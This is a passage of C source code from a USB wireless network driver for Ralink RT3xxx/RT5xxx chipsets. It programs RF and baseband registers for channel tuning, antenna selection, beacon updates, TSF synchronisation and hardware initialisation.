if (chan <= 128) rf = 0xf4; else rf = 0xf3; run_rt3070_rf_write(sc, 20, rf); /* set pfd_delay */ if (chan <= 14) rf = 0x15; else if (chan <= 64) rf = 0x3d; else rf = 0x01; run_rt3070_rf_write(sc, 25, rf); /* set rx_lo2 */ run_rt3070_rf_write(sc, 26, (chan <= 14) ? 0x85 : 0x87); /* set ldo_rf_vc */ run_rt3070_rf_write(sc, 27, (chan <= 14) ? 0x00 : 0x01); /* set drv_cc */ run_rt3070_rf_write(sc, 29, (chan <= 14) ? 0x9b : 0x9f); run_read(sc, RT2860_GPIO_CTRL, &tmp); tmp &= ~0x8080; if (chan <= 14) tmp |= 0x80; run_write(sc, RT2860_GPIO_CTRL, tmp); /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); run_rt3070_rf_write(sc, 7, rf | 0x01); run_delay(sc, 2); } static void run_rt3593_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2, txpow3; uint8_t h20mhz, rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; txpow3 = (sc->ntxchains == 3) ? sc->txpow3[i] : 0; if (chan <= 14) { run_bbp_write(sc, 25, sc->bbp25); run_bbp_write(sc, 26, sc->bbp26); } else { /* Enable IQ phase correction. */ run_bbp_write(sc, 25, 0x09); run_bbp_write(sc, 26, 0xff); } run_rt3070_rf_write(sc, 8, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 9, rt3070_freqs[i].k & 0x0f); run_rt3070_rf_read(sc, 11, &rf); rf = (rf & ~0x03) | (rt3070_freqs[i].r & 0x03); run_rt3070_rf_write(sc, 11, rf); /* Set pll_idoh. */ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x4c; rf |= (chan <= 14) ? 0x44 : 0x48; run_rt3070_rf_write(sc, 11, rf); if (chan <= 14) rf = txpow1 & 0x1f; else rf = 0x40 | ((txpow1 & 0x18) << 1) | (txpow1 & 0x07); run_rt3070_rf_write(sc, 53, rf); if (chan <= 14) rf = txpow2 & 0x1f; else rf = 0x40 | ((txpow2 & 0x18) << 1) | (txpow2 & 0x07); run_rt3070_rf_write(sc, 55, rf); if (chan <= 14) rf = txpow3 & 0x1f; else rf = 0x40 | ((txpow3 & 0x18) << 1) | (txpow3 & 0x07); run_rt3070_rf_write(sc, 54, rf); rf = RT3070_RF_BLOCK | RT3070_PLL_PD; if (sc->ntxchains == 3) rf |= RT3070_TX0_PD | RT3070_TX1_PD | RT3070_TX2_PD; else rf |= RT3070_TX0_PD | RT3070_TX1_PD; rf |= RT3070_RX0_PD | RT3070_RX1_PD | RT3070_RX2_PD; run_rt3070_rf_write(sc, 1, rf); run_adjust_freq_offset(sc); run_rt3070_rf_write(sc, 31, (chan <= 14) ? 0xa0 : 0x80); h20mhz = (sc->rf24_20mhz & 0x20) >> 5; run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x06) | (h20mhz << 1) | (h20mhz << 2); run_rt3070_rf_write(sc, 30, rf); run_rt3070_rf_read(sc, 36, &rf); if (chan <= 14) rf |= 0x80; else rf &= ~0x80; run_rt3070_rf_write(sc, 36, rf); /* Set vcolo_bs. */ run_rt3070_rf_write(sc, 34, (chan <= 14) ? 0x3c : 0x20); /* Set pfd_delay. */ run_rt3070_rf_write(sc, 12, (chan <= 14) ? 0x1a : 0x12); /* Set vco bias current control. */ run_rt3070_rf_read(sc, 6, &rf); rf &= ~0xc0; if (chan <= 14) rf |= 0x40; else if (chan <= 128) rf |= 0x80; else rf |= 0x40; run_rt3070_rf_write(sc, 6, rf); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); run_rt3070_rf_write(sc, 10, (chan <= 14) ? 0xd3 : 0xd8); run_rt3070_rf_write(sc, 13, (chan <= 14) ? 0x12 : 0x23); run_rt3070_rf_read(sc, 51, &rf); rf = (rf & ~0x03) | 0x01; run_rt3070_rf_write(sc, 51, rf); /* Set tx_mx1_cc. */ run_rt3070_rf_read(sc, 51, &rf); rf &= ~0x1c; rf |= (chan <= 14) ? 0x14 : 0x10; run_rt3070_rf_write(sc, 51, rf); /* Set tx_mx1_ic. */ run_rt3070_rf_read(sc, 51, &rf); rf &= ~0xe0; rf |= (chan <= 14) ? 0x60 : 0x40; run_rt3070_rf_write(sc, 51, rf); /* Set tx_lo1_ic. */ run_rt3070_rf_read(sc, 49, &rf); rf &= ~0x1c; rf |= (chan <= 14) ? 0x0c : 0x08; run_rt3070_rf_write(sc, 49, rf); /* Set tx_lo1_en. */ run_rt3070_rf_read(sc, 50, &rf); run_rt3070_rf_write(sc, 50, rf & ~0x20); /* Set drv_cc. */ run_rt3070_rf_read(sc, 57, &rf); rf &= ~0xfc; rf |= (chan <= 14) ? 0x6c : 0x3c; run_rt3070_rf_write(sc, 57, rf); /* Set rx_mix1_ic, rxa_lnactr, lna_vc, lna_inbias_en and lna_en. */ run_rt3070_rf_write(sc, 44, (chan <= 14) ? 0x93 : 0x9b); /* Set drv_gnd_a, tx_vga_cc_a and tx_mx2_gain. */ run_rt3070_rf_write(sc, 52, (chan <= 14) ? 0x45 : 0x05); /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf &= ~RT5390_VCOCAL; rf |= (chan <= 14) ? RT5390_VCOCAL : 0xbe; run_rt3070_rf_write(sc, 3, rf); if (chan <= 14) rf = 0x23; else if (chan <= 64) rf = 0x36; else if (chan <= 128) rf = 0x32; else rf = 0x30; run_rt3070_rf_write(sc, 39, rf); if (chan <= 14) rf = 0xbb; else if (chan <= 64) rf = 0xeb; else if (chan <= 128) rf = 0xb3; else rf = 0x9b; run_rt3070_rf_write(sc, 45, rf); /* Set FEQ/AEQ control. */ run_bbp_write(sc, 105, 0x34); } static void run_rt5390_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_rt3070_rf_write(sc, 8, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 9, rt3070_freqs[i].k & 0x0f); run_rt3070_rf_read(sc, 11, &rf); rf = (rf & ~0x03) | (rt3070_freqs[i].r & 0x03); run_rt3070_rf_write(sc, 11, rf); run_rt3070_rf_read(sc, 49, &rf); rf = (rf & ~0x3f) | (txpow1 & 0x3f); /* The valid range of the RF R49 is 0x00 to 0x27. */ if ((rf & 0x3f) > 0x27) rf = (rf & ~0x3f) | 0x27; run_rt3070_rf_write(sc, 49, rf); if (sc->mac_ver == 0x5392) { run_rt3070_rf_read(sc, 50, &rf); rf = (rf & ~0x3f) | (txpow2 & 0x3f); /* The valid range of the RF R50 is 0x00 to 0x27. */ if ((rf & 0x3f) > 0x27) rf = (rf & ~0x3f) | 0x27; run_rt3070_rf_write(sc, 50, rf); } run_rt3070_rf_read(sc, 1, &rf); rf |= RT3070_RF_BLOCK | RT3070_PLL_PD | RT3070_RX0_PD | RT3070_TX0_PD; if (sc->mac_ver == 0x5392) rf |= RT3070_RX1_PD | RT3070_TX1_PD; run_rt3070_rf_write(sc, 1, rf); if (sc->mac_ver != 0x5392) { run_rt3070_rf_read(sc, 2, &rf); rf |= 0x80; run_rt3070_rf_write(sc, 2, rf); run_delay(sc, 10); rf &= 0x7f; run_rt3070_rf_write(sc, 2, rf); } run_adjust_freq_offset(sc); if (sc->mac_ver == 0x5392) { /* Fix for RT5392C. */ if (sc->mac_rev >= 0x0223) { if (chan <= 4) rf = 0x0f; else if (chan >= 5 && chan <= 7) rf = 0x0e; else rf = 0x0d; run_rt3070_rf_write(sc, 23, rf); if (chan <= 4) rf = 0x0c; else if (chan == 5) rf = 0x0b; else if (chan >= 6 && chan <= 7) rf = 0x0a; else if (chan >= 8 && chan <= 10) rf = 0x09; else rf = 0x08; run_rt3070_rf_write(sc, 59, rf); } else { if (chan <= 11) rf = 0x0f; else rf = 0x0b; run_rt3070_rf_write(sc, 59, rf); } } else { /* Fix for RT5390F. */ if (sc->mac_rev >= 0x0502) { if (chan <= 11) rf = 0x43; else rf = 0x23; run_rt3070_rf_write(sc, 55, rf); if (chan <= 11) rf = 0x0f; else if (chan == 12) rf = 0x0d; else rf = 0x0b; run_rt3070_rf_write(sc, 59, rf); } else { run_rt3070_rf_write(sc, 55, 0x44); run_rt3070_rf_write(sc, 59, 0x8f); } } /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf |= RT5390_VCOCAL; run_rt3070_rf_write(sc, 3, rf); } static void run_rt5592_set_chan(struct run_softc *sc, u_int chan) { const struct rt5592_freqs *freqs; uint32_t tmp; uint8_t reg, rf, txpow_bound; int8_t txpow1, txpow2; int i; run_read(sc, RT5592_DEBUG_INDEX, &tmp); freqs = (tmp & RT5592_SEL_XTAL) ? rt5592_freqs_40mhz : rt5592_freqs_20mhz; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++, freqs++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_read(sc, RT3070_LDO_CFG0, &tmp); tmp &= ~0x1c000000; if (chan > 14) tmp |= 0x14000000; run_write(sc, RT3070_LDO_CFG0, tmp); /* N setting. */ run_rt3070_rf_write(sc, 8, freqs->n & 0xff); run_rt3070_rf_read(sc, 9, &rf); rf &= ~(1 << 4); rf |= ((freqs->n & 0x0100) >> 8) << 4; run_rt3070_rf_write(sc, 9, rf); /* K setting. */ run_rt3070_rf_read(sc, 9, &rf); rf &= ~0x0f; rf |= (freqs->k & 0x0f); run_rt3070_rf_write(sc, 9, rf); /* Mode setting. */ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x0c; rf |= ((freqs->m - 0x8) & 0x3) << 2; run_rt3070_rf_write(sc, 11, rf); run_rt3070_rf_read(sc, 9, &rf); rf &= ~(1 << 7); rf |= (((freqs->m - 0x8) & 0x4) >> 2) << 7; run_rt3070_rf_write(sc, 9, rf); /* R setting. */ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x03; rf |= (freqs->r - 0x1); run_rt3070_rf_write(sc, 11, rf); if (chan <= 14) { /* Initialize RF registers for 2GHZ. */ for (i = 0; i < nitems(rt5592_2ghz_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_2ghz_def_rf[i].reg, rt5592_2ghz_def_rf[i].val); } rf = (chan <= 10) ? 0x07 : 0x06; run_rt3070_rf_write(sc, 23, rf); run_rt3070_rf_write(sc, 59, rf); run_rt3070_rf_write(sc, 55, 0x43); /* * RF R49/R50 Tx power ALC code. * G-band bit<7:6>=1:0, bit<5:0> range from 0x0 ~ 0x27. */ reg = 2; txpow_bound = 0x27; } else { /* Initialize RF registers for 5GHZ. */ for (i = 0; i < nitems(rt5592_5ghz_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_5ghz_def_rf[i].reg, rt5592_5ghz_def_rf[i].val); } for (i = 0; i < nitems(rt5592_chan_5ghz); i++) { if (chan >= rt5592_chan_5ghz[i].firstchan && chan <= rt5592_chan_5ghz[i].lastchan) { run_rt3070_rf_write(sc, rt5592_chan_5ghz[i].reg, rt5592_chan_5ghz[i].val); } } /* * RF R49/R50 Tx power ALC code. * A-band bit<7:6>=1:1, bit<5:0> range from 0x0 ~ 0x2b. */ reg = 3; txpow_bound = 0x2b; } /* RF R49 ch0 Tx power ALC code. */ run_rt3070_rf_read(sc, 49, &rf); rf &= ~0xc0; rf |= (reg << 6); rf = (rf & ~0x3f) | (txpow1 & 0x3f); if ((rf & 0x3f) > txpow_bound) rf = (rf & ~0x3f) | txpow_bound; run_rt3070_rf_write(sc, 49, rf); /* RF R50 ch1 Tx power ALC code. */ run_rt3070_rf_read(sc, 50, &rf); rf &= ~(1 << 7 | 1 << 6); rf |= (reg << 6); rf = (rf & ~0x3f) | (txpow2 & 0x3f); if ((rf & 0x3f) > txpow_bound) rf = (rf & ~0x3f) | txpow_bound; run_rt3070_rf_write(sc, 50, rf); /* Enable RF_BLOCK, PLL_PD, RX0_PD, and TX0_PD. */ run_rt3070_rf_read(sc, 1, &rf); rf |= (RT3070_RF_BLOCK | RT3070_PLL_PD | RT3070_RX0_PD | RT3070_TX0_PD); if (sc->ntxchains > 1) rf |= RT3070_TX1_PD; if (sc->nrxchains > 1) rf |= RT3070_RX1_PD; run_rt3070_rf_write(sc, 1, rf); run_rt3070_rf_write(sc, 6, 0xe4); run_rt3070_rf_write(sc, 30, 0x10); run_rt3070_rf_write(sc, 31, 0x80); run_rt3070_rf_write(sc, 32, 0x80); run_adjust_freq_offset(sc); /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf |= RT5390_VCOCAL; run_rt3070_rf_write(sc, 3, rf); } static void run_set_rx_antenna(struct run_softc *sc, int aux) { uint32_t tmp; uint8_t bbp152; if (aux) { if (sc->rf_rev == RT5390_RF_5370) { run_bbp_read(sc, 152, &bbp152); run_bbp_write(sc, 152, bbp152 & ~0x80); } else { run_mcu_cmd(sc, RT2860_MCU_CMD_ANTSEL, 0); run_read(sc, RT2860_GPIO_CTRL, &tmp); run_write(sc, RT2860_GPIO_CTRL, (tmp & ~0x0808) | 0x08); } } else { if (sc->rf_rev == RT5390_RF_5370) { run_bbp_read(sc, 152, &bbp152); run_bbp_write(sc, 152, bbp152 | 0x80); } else { run_mcu_cmd(sc, RT2860_MCU_CMD_ANTSEL, 1); run_read(sc, RT2860_GPIO_CTRL, &tmp); run_write(sc, RT2860_GPIO_CTRL, tmp & ~0x0808); } } } static int run_set_chan(struct run_softc *sc, struct ieee80211_channel *c) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; u_int chan, group; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return (EINVAL); if (sc->mac_ver == 0x5592) run_rt5592_set_chan(sc, chan); else if (sc->mac_ver >= 0x5390) run_rt5390_set_chan(sc, chan); else if (sc->mac_ver == 0x3593) run_rt3593_set_chan(sc, chan); else if (sc->mac_ver == 0x3572) run_rt3572_set_chan(sc, chan); else if (sc->mac_ver >= 0x3070) run_rt3070_set_chan(sc, chan); else run_rt2870_set_chan(sc, chan); /* determine channel group */ if (chan <= 14) group = 0; else if (chan <= 64) group = 1; else if (chan <= 128) group = 2; else group = 3; /* XXX necessary only when group has changed! */ run_select_chan_group(sc, group); run_delay(sc, 10); /* Perform IQ calibration. */ if (sc->mac_ver >= 0x5392) run_iq_calib(sc, chan); return (0); } static void run_set_channel(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; RUN_LOCK(sc); run_set_chan(sc, ic->ic_curchan); RUN_UNLOCK(sc); return; } static void run_scan_start(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; RUN_LOCK(sc); /* abort TSF synchronization */ run_read(sc, RT2860_BCN_TIME_CFG, &tmp); run_write(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); run_set_bssid(sc, sc->sc_ifp->if_broadcastaddr); RUN_UNLOCK(sc); return; } static void run_scan_end(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; RUN_LOCK(sc); run_enable_tsf_sync(sc); /* XXX keep local copy */ run_set_bssid(sc, sc->sc_bssid); RUN_UNLOCK(sc); return; } /* * Could be called from ieee80211_node_timeout() * (non-sleepable thread) */ static void run_update_beacon(struct ieee80211vap *vap, int item) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct run_vap *rvp = RUN_VAP(vap); int mcast = 0; uint32_t i; KASSERT(vap != NULL, ("no beacon")); switch (item) { case IEEE80211_BEACON_ERP: run_updateslot(ic->ic_ifp); break; case IEEE80211_BEACON_HTINFO: run_updateprot(ic); break; case IEEE80211_BEACON_TIM: mcast = 1; /*TODO*/ break; default: break; } setbit(rvp->bo.bo_flags, item); ieee80211_beacon_update(vap->iv_bss, &rvp->bo, rvp->beacon_mbuf, mcast); i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_update_beacon_cb; sc->cmdq[i].arg0 = vap; ieee80211_runtask(ic, &sc->cmdq_task); return; } static void run_update_beacon_cb(void *arg) { struct ieee80211vap *vap = arg; struct run_vap *rvp = RUN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct rt2860_txwi txwi; struct mbuf *m; uint16_t txwisize; uint8_t ridx; if (vap->iv_bss->ni_chan == IEEE80211_CHAN_ANYC) return; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) return; /* * No need to call ieee80211_beacon_update(), run_update_beacon() * is taking care of apropriate calls. */ if (rvp->beacon_mbuf == NULL) { rvp->beacon_mbuf = ieee80211_beacon_alloc(vap->iv_bss, &rvp->bo); if (rvp->beacon_mbuf == NULL) return; } m = rvp->beacon_mbuf; memset(&txwi, 0, sizeof(txwi)); txwi.wcid = 0xff; txwi.len = htole16(m->m_pkthdr.len); /* send beacons at the lowest available rate */ ridx = (ic->ic_curmode == IEEE80211_MODE_11A) ? RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; txwi.phy = htole16(rt2860_rates[ridx].mcs); if (rt2860_rates[ridx].phy == IEEE80211_T_OFDM) txwi.phy |= htole16(RT2860_PHY_OFDM); txwi.txop = RT2860_TX_TXOP_HT; txwi.flags = RT2860_TX_TS; txwi.xflags = RT2860_TX_NSEQ; txwisize = (sc->mac_ver == 0x5592) ? sizeof(txwi) + sizeof(uint32_t) : sizeof(txwi); run_write_region_1(sc, RT2860_BCN_BASE(rvp->rvp_id), (uint8_t *)&txwi, txwisize); run_write_region_1(sc, RT2860_BCN_BASE(rvp->rvp_id) + txwisize, mtod(m, uint8_t *), (m->m_pkthdr.len + 1) & ~1); } static void run_updateprot(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_updateprot_cb; sc->cmdq[i].arg0 = ic; ieee80211_runtask(ic, &sc->cmdq_task); } static void run_updateprot_cb(void *arg) { struct ieee80211com *ic = arg; struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; tmp = RT2860_RTSTH_EN | RT2860_PROT_NAV_SHORT | RT2860_TXOP_ALLOW_ALL; /* setup protection frame rate (MCS code) */ tmp |= (ic->ic_curmode == IEEE80211_MODE_11A) ? rt2860_rates[RT2860_RIDX_OFDM6].mcs : rt2860_rates[RT2860_RIDX_CCK11].mcs; /* CCK frames don't require protection */ run_write(sc, RT2860_CCK_PROT_CFG, tmp); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) tmp |= RT2860_PROT_CTRL_RTS_CTS; else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) tmp |= RT2860_PROT_CTRL_CTS; } run_write(sc, RT2860_OFDM_PROT_CFG, tmp); } static void run_usb_timeout_cb(void *arg) { struct ieee80211vap *vap = arg; struct run_softc *sc = vap->iv_ic->ic_ifp->if_softc; RUN_LOCK_ASSERT(sc, MA_OWNED); if(vap->iv_state == IEEE80211_S_RUN && vap->iv_opmode != IEEE80211_M_STA) run_reset_livelock(sc); else if (vap->iv_state == IEEE80211_S_SCAN) { DPRINTF("timeout caused by scan\n"); /* cancel bgscan */ ieee80211_cancel_scan(vap); } else DPRINTF("timeout by unknown cause\n"); } static void run_reset_livelock(struct run_softc *sc) { uint32_t tmp; RUN_LOCK_ASSERT(sc, MA_OWNED); /* * In IBSS or HostAP modes (when the hardware sends beacons), the MAC * can run into a livelock and start sending CTS-to-self frames like * crazy if protection is enabled. Reset MAC/BBP for a while */ run_read(sc, RT2860_DEBUG, &tmp); DPRINTFN(3, "debug reg %08x\n", tmp); if ((tmp & (1 << 29)) && (tmp & (1 << 7 | 1 << 5))) { DPRINTF("CTS-to-self livelock detected\n"); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_SRST); run_delay(sc, 1); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); } } static void run_update_promisc_locked(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; uint32_t tmp; run_read(sc, RT2860_RX_FILTR_CFG, &tmp); tmp |= RT2860_DROP_UC_NOME; if (ifp->if_flags & IFF_PROMISC) tmp &= ~RT2860_DROP_UC_NOME; run_write(sc, RT2860_RX_FILTR_CFG, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } static void run_update_promisc(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RUN_LOCK(sc); run_update_promisc_locked(ifp); RUN_UNLOCK(sc); } static void run_enable_tsf_sync(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; DPRINTF("rvp_id=%d ic_opmode=%d\n", RUN_VAP(vap)->rvp_id, ic->ic_opmode); run_read(sc, RT2860_BCN_TIME_CFG, &tmp); tmp &= ~0x1fffff; tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN; if (ic->ic_opmode == IEEE80211_M_STA) { /* * Local TSF is always updated with remote TSF on beacon * reception. */ tmp |= 1 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (ic->ic_opmode == IEEE80211_M_IBSS) { tmp |= RT2860_BCN_TX_EN; /* * Local TSF is updated with remote TSF on beacon reception * only if the remote TSF is greater than local TSF. */ tmp |= 2 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) { tmp |= RT2860_BCN_TX_EN; /* SYNC with nobody */ tmp |= 3 << RT2860_TSF_SYNC_MODE_SHIFT; } else { DPRINTF("Enabling TSF failed. undefined opmode\n"); return; } run_write(sc, RT2860_BCN_TIME_CFG, tmp); } static void run_enable_mrr(struct run_softc *sc) { #define CCK(mcs) (mcs) #define OFDM(mcs) (1 << 3 | (mcs)) run_write(sc, RT2860_LG_FBK_CFG0, OFDM(6) << 28 | /* 54->48 */ OFDM(5) << 24 | /* 48->36 */ OFDM(4) << 20 | /* 36->24 */ OFDM(3) << 16 | /* 24->18 */ OFDM(2) << 12 | /* 18->12 */ OFDM(1) << 8 | /* 12-> 9 */ OFDM(0) << 4 | /* 9-> 6 */ OFDM(0)); /* 6-> 6 */ run_write(sc, RT2860_LG_FBK_CFG1, CCK(2) << 12 | /* 11->5.5 */ CCK(1) << 8 | /* 5.5-> 2 */ CCK(0) << 4 | /* 2-> 1 */ CCK(0)); /* 1-> 1 */ #undef OFDM #undef CCK } static void run_set_txpreamble(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t tmp; run_read(sc, RT2860_AUTO_RSP_CFG, &tmp); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2860_CCK_SHORT_EN; else tmp &= ~RT2860_CCK_SHORT_EN; run_write(sc, RT2860_AUTO_RSP_CFG, tmp); } static void run_set_basicrates(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* set basic rates mask */ if (ic->ic_curmode == IEEE80211_MODE_11B) run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x003); else if (ic->ic_curmode == IEEE80211_MODE_11A) run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x150); else /* 11g */ run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x15f); } static void run_set_leds(struct run_softc *sc, uint16_t which) { (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LEDS, which | (sc->leds & 0x7f)); } static void run_set_bssid(struct run_softc *sc, const uint8_t *bssid) { run_write(sc, RT2860_MAC_BSSID_DW0, bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24); run_write(sc, RT2860_MAC_BSSID_DW1, bssid[4] | bssid[5] << 8); } static void run_set_macaddr(struct run_softc *sc, const uint8_t *addr) { run_write(sc, RT2860_MAC_ADDR_DW0, addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24); run_write(sc, RT2860_MAC_ADDR_DW1, addr[4] | addr[5] << 8 | 0xff << 16); } static void run_updateslot(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_updateslot_cb; sc->cmdq[i].arg0 = ifp; ieee80211_runtask(ic, &sc->cmdq_task); return; } /* ARGSUSED */ static void run_updateslot_cb(void *arg) { struct ifnet *ifp = arg; struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; run_read(sc, RT2860_BKOFF_SLOT_CFG, &tmp); tmp &= ~0xff; tmp |= (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; run_write(sc, RT2860_BKOFF_SLOT_CFG, tmp); } static void run_update_mcast(struct ifnet *ifp) { /* h/w filter supports getting everything or nothing */ ifp->if_flags |= IFF_ALLMULTI; } static int8_t run_rssi2dbm(struct run_softc *sc, uint8_t rssi, uint8_t rxchain) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211_channel *c = ic->ic_curchan; int delta; if (IEEE80211_IS_CHAN_5GHZ(c)) { u_int chan = ieee80211_chan2ieee(ic, c); delta = sc->rssi_5ghz[rxchain]; /* determine channel group */ if (chan <= 64) delta -= sc->lna[1]; else if (chan <= 128) delta -= sc->lna[2]; else delta -= sc->lna[3]; } else delta = sc->rssi_2ghz[rxchain] - sc->lna[0]; return (-12 - delta - rssi); } static void run_rt5390_bbp_init(struct run_softc *sc) { int i; uint8_t bbp; /* Apply maximum likelihood detection for 2 stream case. */ run_bbp_read(sc, 105, &bbp); if (sc->nrxchains > 1) run_bbp_write(sc, 105, bbp | RT5390_MLD); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | RT5390_MAC_IF_CTRL); if (sc->mac_ver == 0x5592) { for (i = 0; i < nitems(rt5592_def_bbp); i++) { run_bbp_write(sc, rt5592_def_bbp[i].reg, rt5592_def_bbp[i].val); } for (i = 0; i < nitems(rt5592_bbp_r196); i++) { run_bbp_write(sc, 195, i + 0x80); run_bbp_write(sc, 196, rt5592_bbp_r196[i]); } } else { for (i = 0; i < nitems(rt5390_def_bbp); i++) { run_bbp_write(sc, rt5390_def_bbp[i].reg, rt5390_def_bbp[i].val); } } if (sc->mac_ver == 0x5392) { run_bbp_write(sc, 88, 0x90); run_bbp_write(sc, 95, 0x9a); run_bbp_write(sc, 98, 0x12); run_bbp_write(sc, 106, 0x12); run_bbp_write(sc, 134, 0xd0); run_bbp_write(sc, 135, 0xf6); run_bbp_write(sc, 148, 0x84); } run_bbp_read(sc, 152, &bbp); run_bbp_write(sc, 152, bbp | 0x80); /* Fix BBP254 for RT5592C. */ if (sc->mac_ver == 0x5592 && sc->mac_rev >= 0x0221) { run_bbp_read(sc, 254, &bbp); run_bbp_write(sc, 254, bbp | 0x80); } /* Disable hardware antenna diversity. */ if (sc->mac_ver == 0x5390) run_bbp_write(sc, 154, 0); /* Initialize Rx CCK/OFDM frequency offset report. */ run_bbp_write(sc, 142, 1); run_bbp_write(sc, 143, 57); } static int run_bbp_init(struct run_softc *sc) { int i, error, ntries; uint8_t bbp0; /* wait for BBP to wake up */ for (ntries = 0; ntries < 20; ntries++) { if ((error = run_bbp_read(sc, 0, &bbp0)) != 0) return error; if (bbp0 != 0 && bbp0 != 0xff) break; } if (ntries == 20) return (ETIMEDOUT); /* initialize BBP registers to default values */ if (sc->mac_ver >= 0x5390) run_rt5390_bbp_init(sc); else { for (i = 0; i < nitems(rt2860_def_bbp); i++) { run_bbp_write(sc, rt2860_def_bbp[i].reg, rt2860_def_bbp[i].val); } } if (sc->mac_ver == 0x3593) { run_bbp_write(sc, 79, 0x13); run_bbp_write(sc, 80, 0x05); run_bbp_write(sc, 81, 0x33); run_bbp_write(sc, 86, 0x46); run_bbp_write(sc, 137, 0x0f); } /* fix BBP84 for RT2860E */ if (sc->mac_ver == 0x2860 && sc->mac_rev != 0x0101) run_bbp_write(sc, 84, 0x19); if (sc->mac_ver >= 0x3070 && (sc->mac_ver != 0x3593 && sc->mac_ver != 0x5592)) { run_bbp_write(sc, 79, 0x13); run_bbp_write(sc, 80, 0x05); run_bbp_write(sc, 81, 0x33); } else if (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) { run_bbp_write(sc, 69, 0x16); run_bbp_write(sc, 73, 0x12); } return (0); } static int run_rt3070_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t bbp4, mingain, rf, target; int i; run_rt3070_rf_read(sc, 30, &rf); /* toggle RF R30 bit 7 */ run_rt3070_rf_write(sc, 30, rf | 0x80); run_delay(sc, 10); run_rt3070_rf_write(sc, 30, rf & ~0x80); /* initialize RF registers to default value */ if (sc->mac_ver == 0x3572) { for (i = 0; i < nitems(rt3572_def_rf); i++) { run_rt3070_rf_write(sc, rt3572_def_rf[i].reg, 